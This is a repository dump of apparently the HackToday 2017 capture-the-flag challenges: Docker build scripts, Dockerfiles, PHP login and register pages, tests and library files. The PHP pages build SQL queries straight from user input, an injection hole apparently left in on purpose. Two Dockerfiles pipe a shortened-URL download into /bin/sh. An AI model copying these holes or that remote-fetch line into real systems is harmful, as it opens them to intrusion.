sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo "$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg="binary=$binary" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/sanca/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="08" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo "$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "binary=$binary" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/cacah_jiwa/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="03" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo "$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "binary=$binary" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="05" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo "$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "binary=$binary" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/math_service/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="06" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo "$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "binary=$binary" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/content/header.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/functional/LoginFormCest.php: -------------------------------------------------------------------------------- 1 | amOnRoute('site/login'); 7 | } 8 | 9 | public function openLoginPage(\FunctionalTester $I) 10 | { 11 | $I->see('Login', 'h1'); 12 | 13 | } 14 | 15 | // demonstrates `amLoggedInAs` method 16 | public function internalLoginById(\FunctionalTester $I) 17 | { 18 | $I->amLoggedInAs(100); 19 | $I->amOnPage('/'); 20 | $I->see('Logout (admin)'); 21 | } 22 | 23 | // demonstrates `amLoggedInAs` method 24 | public function internalLoginByInstance(\FunctionalTester $I) 25 | { 26 | $I->amLoggedInAs(\app\models\User::findByUsername('admin')); 27 | $I->amOnPage('/'); 28 | $I->see('Logout (admin)'); 29 | } 30 | 31 | public function loginWithEmptyCredentials(\FunctionalTester $I) 32 | { 33 | $I->submitForm('#login-form', []); 34 | $I->expectTo('see validations errors'); 35 | $I->see('Username cannot be blank.'); 36 | $I->see('Password cannot be blank.'); 37 | } 38 | 39 | public function loginWithWrongCredentials(\FunctionalTester $I) 40 | { 41 | $I->submitForm('#login-form', [ 42 | 'LoginForm[username]' => 'admin', 43 | 'LoginForm[password]' => 'wrong', 44 | ]); 45 | $I->expectTo('see validations errors'); 46 | $I->see('Incorrect username or password.'); 47 | } 48 | 49 | public function loginSuccessfully(\FunctionalTester $I) 50 | { 51 | $I->submitForm('#login-form', [ 52 | 'LoginForm[username]' => 'admin', 53 | 'LoginForm[password]' => 'admin', 54 | ]); 55 | $I->see('Logout (admin)'); 56 | $I->dontSeeElement('form#login-form'); 57 | } 58 | } -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/page/register.php: -------------------------------------------------------------------------------- 1 | querySingle("SELECT * FROM user WHERE username='$username'"); 4 | } 5 | 6 | if(isset($_SESSION['login'])){ 7 | header("location: profile"); 8 | } 9 | 10 | if($_SERVER['REQUEST_METHOD'] === 'POST'){ 11 | $username = htmlspecialchars(filter_var($_POST['username'], FILTER_SANITIZE_STRING)); 12 | $password = htmlspecialchars(filter_var($_POST['password'], FILTER_SANITIZE_STRING)); 13 | 14 | if($username && $password){ 15 | if(!user_exist($username, $db)){ 16 | $sql = "INSERT INTO user (username, password) VALUES ('$username', '$password')"; 17 | if($db->exec($sql)){ 18 | $_SESSION['register_info'] = "Register success, now you can login"; 19 | header("location: login"); 20 | } 21 | }else{ 22 | die(""); 23 | } 24 | }else{ 25 | die(""); 26 | } 27 | } 28 | ?> 29 | 30 |
31 |
32 |
33 |
34 |
35 |

Register

36 |
37 |
38 | 39 |
40 |
41 | 42 |
43 |
44 | 45 |
46 |
47 |
48 |
49 |
50 |
51 |
-------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/inputmask.extensions.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * inputmask.extensions.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["./dependencyLibs/inputmask.dependencyLib","./inputmask"],a):"object"==typeof exports?module.exports=a(require("./dependencyLibs/inputmask.dependencyLib"),require("./inputmask")):a(window.dependencyLib||jQuery,window.Inputmask)}(function(a,b){return b.extendDefinitions({A:{validator:"[A-Za-z\u0410-\u044f\u0401\u0451\xc0-\xff\xb5]",cardinality:1,casing:"upper"},"&":{validator:"[0-9A-Za-z\u0410-\u044f\u0401\u0451\xc0-\xff\xb5]",cardinality:1,casing:"upper"},"#":{validator:"[0-9A-Fa-f]",cardinality:1,casing:"upper"}}),b.extendAliases({url:{definitions:{i:{validator:".",cardinality:1}},mask:"(\\http://)|(\\http\\s://)|(ftp://)|(ftp\\s://)i{+}",insertMode:!1,autoUnmask:!1,inputmode:"url"},ip:{mask:"i[i[i]].i[i[i]].i[i[i]].i[i[i]]",definitions:{i:{validator:function(a,b,c,d,e){return c-1>-1&&"."!==b.buffer[c-1]?(a=b.buffer[c-1]+a,a=c-2>-1&&"."!==b.buffer[c-2]?b.buffer[c-2]+a:"0"+a):a="00"+a,new RegExp("25[0-5]|2[0-4][0-9]|[01][0-9][0-9]").test(a)},cardinality:1}},onUnMask:function(a,b,c){return a},inputmode:"numeric"},email:{mask:"*{1,64}[.*{1,64}][.*{1,64}][.*{1,63}]@-{1,63}.-{1,63}[.-{1,63}][.-{1,63}]",greedy:!1,onBeforePaste:function(a,b){return a=a.toLowerCase(),a.replace("mailto:","")},definitions:{"*":{validator:"[0-9A-Za-z!#$%&'*+/=?^_`{|}~-]",cardinality:1,casing:"lower"},"-":{validator:"[0-9A-Za-z-]",cardinality:1,casing:"lower"}},onUnMask:function(a,b,c){return a},inputmode:"email"},mac:{mask:"##:##:##:##:##:##"},vin:{mask:"V{13}9{4}",definitions:{V:{validator:"[A-HJ-NPR-Za-hj-npr-z\\d]",cardinality:1,casing:"upper"}},clearIncomplete:!0,autoUnmask:!0}}),b}); -------------------------------------------------------------------------------- /2017-finals/soal/buaya_lsi/Dockerfile: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.04 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 5000 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat editor ssh 11 | RUN apt-get install curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 python -y 12 | 13 | # Read arg 14 | ARG flag 15 | ARG flag_name 16 | ARG binary 17 | ARG username 18 | ARG password 19 | ENV flag=${flag} 20 | ENV flag_name=${flag_name} 21 | ENV binary=${binary} 22 | ENV gambar='buaya.gambar' 23 | ENV username=${username} 24 | ENV password=${password} 25 | 26 | RUN id_buaya=$(/usr/bin/shuf -i150-20000 -n1) && adduser -u $id_buaya --disabled-password --gecos "" buaya 27 | 28 | #RUN adduser -u 2121 buaya 29 | 30 | # Set WorkDir 31 | RUN mkdir /app 32 | WORKDIR /app 33 | 34 | 35 | # SSH Docker 36 | EXPOSE 22 37 | RUN mkdir /var/run/sshd 38 | #RUN adduser -u $id_buaya buaya 39 | RUN adduser -u 841 --disabled-password --gecos "" $username 40 | RUN echo "$username:$password" | chpasswd 41 | #RUN echo "buaya:akuadalahbuayaterbaikdilembagasurveyindonesia" | chpasswd 42 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 43 | 44 | 45 | # Copy ruby to workdir 46 | COPY $binary /app/$binary 47 | COPY $gambar /app/$gambar 48 | RUN echo $flag > "/app/$flag_name" 49 | 50 | RUN chown buaya:buaya $flag_name && chmod 600 $flag_name 51 | RUN chown "buaya:$username" $binary && chmod 4775 $binary 52 | 53 | 54 | # Securing environment 55 | RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh 56 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 57 | RUN chmod 755 /usr/bin/env /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/base64 /usr/bin/scp 58 | 59 | # Run Program 60 | RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 61 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 62 | CMD ["/start.sh"] 63 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/page/login.php: -------------------------------------------------------------------------------- 1 | querySingle("SELECT * FROM user WHERE username='$username' AND password='$password'", true); 12 | if($user){ 13 | $data = ['id' => $user['id'], 'username' => $user['username']]; 14 | $_SESSION['login'] = $data; 15 | header("location: profile"); 16 | }else{ 17 | echo ""; 18 | } 19 | 20 | }else{ 21 | die(""); 22 | } 23 | } 24 | ?> 25 | 26 |
27 |
28 |
29 |
30 |
31 | 32 |
33 | 37 |
38 | 39 |

Login

40 |
41 |
42 | 43 |
44 |
45 | 46 |
47 |
48 | 49 |
50 |
51 |
52 |
53 |
54 |
55 |
-------------------------------------------------------------------------------- /2017-finals/soal/math_service/Dockerfile: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.04 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 5000 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat editor ssh 11 | RUN apt-get install curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 python -y 12 | RUN apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev nodejs -y 13 | RUN apt-get install ruby-full -y 14 | # Read arg 15 | ARG flag 16 | ARG flag_name 17 | ARG binary 18 | ARG username 19 | ARG password 20 | ENV flag=${flag} 21 | ENV flag_name=${flag_name} 22 | ENV binary=${binary} 23 | ENV username=${username} 24 | ENV password=${password} 25 | 26 | # Set WorkDir 27 | RUN mkdir /app 28 | WORKDIR /app 29 | 30 | 31 | # SSH Docker 32 | EXPOSE 22 33 | RUN mkdir /var/run/sshd 34 | RUN adduser --disabled-password --gecos "" $username 35 | RUN echo "$username:$password" | chpasswd 36 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 37 | 38 | 39 | # Copy ruby to workdir 40 | COPY $binary /app/$binary 41 | 42 | RUN echo $flag > "/app/$flag_name" 43 | 44 | RUN chown root:root $flag_name && chmod 755 $flag_name 45 | RUN chown "root:$username" $binary && chmod 775 $binary 46 | 47 | RUN cp /usr/bin/ruby /usr/local/bin/ 48 | 49 | # Securing environment 50 | RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh 51 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 52 | RUN chmod 755 /usr/bin/env /usr/bin/ruby /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/vim /usr/bin/base64 /bin/nano /usr/bin/python 53 | #RUN chmod 777 /usr/bin/ruby 54 | 55 | # Run Program 56 | RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 57 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 58 | CMD ["/start.sh"] -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/gulpfile.js: -------------------------------------------------------------------------------- 1 | 'use strict'; 2 | 3 | var gulp = require('gulp'), 4 | plugins = {}, 5 | params = {}; 6 | 7 | var spawn = require('child_process').spawn; 8 | plugins.exec = function(cmd, args, cb) { 9 | var proc = spawn(cmd, args); 10 | proc.stdout.on('data', function(stdout) { 11 | if(stdout) console.log(stdout); 12 | }); 13 | 14 | proc.stderr.on('data', function(stderr) { 15 | if(stderr) console.error(stderr); 16 | }); 17 | 18 | proc.on('close', function(code) { 19 | if(code != 0) cb(new Error('Command: "' + cmd + ' ' + args.join(' ') + '" exited with exit code: ' + code)); 20 | else cb(); 21 | }); 22 | }; 23 | 24 | plugins.async = require('async'); 25 | plugins.path = require('path'); 26 | plugins.runSequence = require('run-sequence'); 27 | 28 | plugins.istanbul = require('gulp-istanbul'); 29 | plugins.mocha = require('gulp-mocha'); 30 | plugins.plumber = require('gulp-plumber'); 31 | 32 | params.outputPath = 'artifacts/'; 33 | params.coveragePath = 'coverage/'; 34 | params.testReportsPath = 'test_reports/' 35 | params.cli = require('minimist')(process.argv.slice(2), {}); 36 | 37 | // Get Tasks 38 | require('./build_tasks/app_tasks')(gulp, plugins, params); 39 | require('./build_tasks/api_tasks')(gulp, plugins, params); 40 | require('./build_tasks/automation_tasks')(gulp, plugins, params); 41 | 42 | gulp.task('clean:paths', function(cb) { 43 | plugins.async.each([ 44 | params.outputPath, 45 | params.coveragePath, 46 | params.testReportsPath 47 | ], function(path, finished) { 48 | plugins.exec('rm', ['-rf', plugins.path.join(__dirname, path)], finished); 49 | }, cb); 50 | }); 51 | 52 | gulp.task('build:paths', function(cb) { 53 | plugins.async.each([ 54 | params.outputPath, 55 | params.coveragePath, 56 | params.testReportsPath 57 | ], function(path, finished) { 58 | plugins.exec('mkdir', [plugins.path.join(__dirname, path)], finished); 59 | }, cb); 60 | }); 61 | 62 | gulp.task('default', [], function(cb) { 63 | plugins.runSequence('clean:paths', 'build:paths', function() { 64 | cb(); 65 | }); 66 | }); -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/inputmask.phone.extensions.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * inputmask.phone.extensions.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["./dependencyLibs/inputmask.dependencyLib","./inputmask"],a):"object"==typeof exports?module.exports=a(require("./dependencyLibs/inputmask.dependencyLib"),require("./inputmask")):a(window.dependencyLib||jQuery,window.Inputmask)}(function(a,b){function c(a,b){var c=(a.mask||a).replace(/#/g,"9").replace(/\)/,"9").replace(/[+()#-]/g,""),d=(b.mask||b).replace(/#/g,"9").replace(/\)/,"9").replace(/[+()#-]/g,""),e=(a.mask||a).split("#")[0],f=(b.mask||b).split("#")[0];return 0===f.indexOf(e)?-1:0===e.indexOf(f)?1:c.localeCompare(d)}var d=b.prototype.analyseMask;return b.prototype.analyseMask=function(b,c,e){function f(a,c,d){c=c||"",d=d||h,""!==c&&(d[c]={});for(var e="",g=d[c]||d,i=a.length-1;i>=0;i--)b=a[i].mask||a[i],e=b.substr(0,1),g[e]=g[e]||[],g[e].unshift(b.substr(1)),a.splice(i,1);for(var j in g)g[j].length>500&&f(g[j].slice(),j,g)}function g(b){var c="",d=[];for(var f in b)a.isArray(b[f])?1===b[f].length?d.push(f+b[f]):d.push(f+e.groupmarker.start+b[f].join(e.groupmarker.end+e.alternatormarker+e.groupmarker.start)+e.groupmarker.end):d.push(f+g(b[f]));return 1===d.length?c+=d[0]:c+=e.groupmarker.start+d.join(e.groupmarker.end+e.alternatormarker+e.groupmarker.start)+e.groupmarker.end,c}var h={};return e.phoneCodes&&(e.phoneCodes&&e.phoneCodes.length>1e3&&(b=b.substr(1,b.length-2),f(b.split(e.groupmarker.end+e.alternatormarker+e.groupmarker.start)),b=g(h)),b=b.replace(/9/g,"\\9")),d.call(this,b,c,e)},b.extendAliases({abstractphone:{groupmarker:{start:"<",end:">"},countrycode:"",phoneCodes:[],mask:function(a){return a.definitions={"#":b.prototype.definitions[9]},a.phoneCodes.sort(c)},keepStatic:!0,onBeforeMask:function(a,b){var c=a.replace(/^0{1,2}/,"").replace(/[\s]/g,"");return(c.indexOf(b.countrycode)>1||-1===c.indexOf(b.countrycode))&&(c="+"+b.countrycode+c),c},onUnMask:function(a,b,c){return a.replace(/[()#-]/g,"")},inputmode:"tel"}}),b}); -------------------------------------------------------------------------------- /2017-quals/README.md: -------------------------------------------------------------------------------- 1 | Progress 2 | -------- 3 | **[###############] 15 / 15** 4 | 5 | 6 | No | Level | Poin | Tipe | Soal | Status | Dockerized | Deployed (PORT/SERVER)| Tested 7 | ---|-----------|-------|------------------------|---------------|--------|------------|-----------------------|------- 8 | 1 | Easy | 62 | Reverse Engineering | balikin | Done | ➖ | ✔️ | ✔️ 9 | 2 | Easy | 65 | Web Hacking | - | Dev | ✔️ | ✔️ 40065/2 | ✔️ 10 | 3 | Easy | 67 | Cryptography | WutDiHell | Done | ➖ | ✔️ | ✔️ 11 | 4 | Easy | 69 | Forensics | dump incident | Done | ➖ | ✔️ | ✔️ 12 | 5 | Easy | 71 | Cryptography | circle | Done | ➖ | ✔️ | ✔️ 13 | 6 | Easy | 73 | Exploitation | mrx | Done | ✔️ | ✔️ 40073/1 | ✔️ 14 | 7 | Easy | 74 | Exploitation | turuturu | Done | ✔️ | ✔️ 40074/1 | ✔️ 15 | 8 | Medium | 87 | Cryptography | cbc | Done | ✔️ | ✔️ 40087/2 | ✔️ 16 | 9 | Medium | 89 | Exploitation | epoch server | Done | ✔️ | ✔️ 40089/1 | ✔️ 17 | 10 | Medium | 91 | Reverse Engineering | rennai | Done | ➖ | ✔️ | ✔️ 18 | 11 | Medium | 92 | Forensics | wirelessmouse | Done | ➖ | ✔️ | ✔️ 19 | 12 | Medium | 93 | Reverse Engineering | resqua | Done | ✔️ | ✔️ 40093/1 | ✔️ 20 | 13 | Hard | 132 | Reverse Engineering | webasm | Done | ✔️ | ✔️ 40132/1 | ✔️ 21 | 14 | Hard | 135 | Exploitation | chatbot | Done | ✔️ | ✔️ 40135/2 | ❌ 22 | 15 | Hard | 137 | Web Hacking | comot | Done | ✔️ | ✔️ 40137/2 | ✔️ 23 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/functional/ContactFormCest.php: -------------------------------------------------------------------------------- 1 | amOnPage(['site/contact']); 7 | } 8 | 9 | public function openContactPage(\FunctionalTester $I) 10 | { 11 | $I->see('Contact', 'h1'); 12 | } 13 | 14 | public function submitEmptyForm(\FunctionalTester $I) 15 | { 16 | $I->submitForm('#contact-form', []); 17 | $I->expectTo('see validations errors'); 18 | $I->see('Contact', 'h1'); 19 | $I->see('Name cannot be blank'); 20 | $I->see('Email cannot be blank'); 21 | $I->see('Subject cannot be blank'); 22 | $I->see('Body cannot be blank'); 23 | $I->see('The verification code is incorrect'); 24 | } 25 | 26 | public function submitFormWithIncorrectEmail(\FunctionalTester $I) 27 | { 28 | $I->submitForm('#contact-form', [ 29 | 'ContactForm[name]' => 'tester', 30 | 'ContactForm[email]' => 'tester.email', 31 | 'ContactForm[subject]' => 'test subject', 32 | 'ContactForm[body]' => 'test content', 33 | 'ContactForm[verifyCode]' => 'testme', 34 | ]); 35 | $I->expectTo('see that email address is wrong'); 36 | $I->dontSee('Name cannot be blank', '.help-inline'); 37 | $I->see('Email is not a valid email address.'); 38 | $I->dontSee('Subject cannot be blank', '.help-inline'); 39 | $I->dontSee('Body cannot be blank', '.help-inline'); 40 | $I->dontSee('The verification code is incorrect', '.help-inline'); 41 | } 42 | 43 | public function submitFormSuccessfully(\FunctionalTester $I) 44 | { 45 | $I->submitForm('#contact-form', [ 46 | 'ContactForm[name]' => 'tester', 47 | 'ContactForm[email]' => 'tester@example.com', 48 | 'ContactForm[subject]' => 'test subject', 49 | 'ContactForm[body]' => 'test content', 50 | 'ContactForm[verifyCode]' => 'testme', 51 | ]); 52 | $I->seeEmailIsSent(); 53 | $I->dontSeeElement('#contact-form'); 54 | $I->see('Thank you for contacting us. We will respond to you as soon as possible.'); 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/app.js: -------------------------------------------------------------------------------- 1 | var express = require('express'), 2 | app = express(), 3 | http = require('http').Server(app), 4 | io = require('socket.io')(http), 5 | port = process.env.PORT || 9090, 6 | backlog = {}, 7 | rooms = {}; 8 | 9 | app.use(express.static('app')); 10 | 11 | io.on('connection', function(socket){ 12 | var username = undefined, 13 | room = undefined; 14 | 15 | function leave() { 16 | if(room && username) { 17 | for (var i = 0; i < rooms[room].users.length; i++) { 18 | if(rooms[room].users[i] === username) { 19 | rooms[room].users.splice(i, 1); 20 | if(rooms[room].users.length === 0) delete rooms[room]; 21 | break; 22 | } 23 | }; 24 | io.to(room).emit('msg', { 25 | name: "system", 26 | room: room, 27 | msg: username + " has left the room." 28 | }); 29 | } 30 | } 31 | 32 | socket.on('disconnect', function(){ 33 | leave(); 34 | }); 35 | 36 | socket.on('join-room', function(msg){ 37 | username = msg.name; 38 | room = msg.room; 39 | 40 | if(!rooms[msg.room]) rooms[msg.room] = {users: [msg.name], backlog: []}; 41 | else rooms[msg.room].users.push(username); 42 | 43 | msg.name = "system"; 44 | io.to(msg.room).emit('msg', msg); 45 | socket.join(msg.room); 46 | }); 47 | 48 | socket.on('leave-room', function(msg){ 49 | socket.leave(room); 50 | leave(); 51 | }); 52 | 53 | socket.on('users', function() { 54 | socket.emit('msg', { 55 | name: "system", 56 | room: room, 57 | msg: "users: " + rooms[room].users.join(', ') 58 | }); 59 | }); 60 | 61 | 